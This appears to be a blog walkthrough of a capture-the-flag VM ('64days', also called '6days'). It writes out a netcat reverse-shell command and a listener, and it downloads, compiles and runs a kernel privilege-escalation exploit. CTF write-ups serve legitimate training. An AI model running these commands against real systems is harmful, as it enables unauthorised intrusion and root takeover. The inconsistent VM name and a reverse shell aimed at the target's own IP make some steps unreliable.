Hack the 64days VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “CanYouPwn.Me” and it is another boot2root challenge where we have to execute flag file to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover


Use nmap for port enumeration
nmap –sV  192.168.0.18


We find port is open so we open this ip on our browser.




We find that this page maybe vulnerable to LFI and RFI so we use curl to implement our attack.


We find that LFI is working on this site. Now we take a look at the config file to find the name of the database.


Taking a look at the config file we found that it accessible through localhost. So we use SQL injection with LFI to access the database. Port 80 had WAF so we use 8080 to access the localhost.


We find a username and password.  We know that ssh is open so we try this username and password to login through ssh.
ssh andrea@192.168.0.18


Now we are connected through ssh, but when we try to run commands it seems like no command is working. It is possible that output is redirected to null. So we use netcat to get a reverse shell

We set up a listener on our system first.

nc –lvp  1234


No we try to connect using netcat reverse shell

nc –e /bin/sh 192.168.0.18 1234 


When we got the shell we see that we can see the output of the commands. We also find that the OS is Ubuntu 12.04 that is vulnerable to overlays exploit.



So we move to /tmp/ folder and download overlays exploit and save it as exploit.c
cd /tmp/
wget https://www.exploit-db.com/download/37292  --no-check-certificate
mv 37292 exploit.c


We compile the file and save it as exploit. We give it executable permission then run the file.
gcc –o exploit exploit.c
chmod 777 exploit
./exploit


Now we have root access. When we go back we find an executable file called flag.


When we run the executable file it shows us a congratulation message stating we completed the challenge.


0 comments:

Post a Comment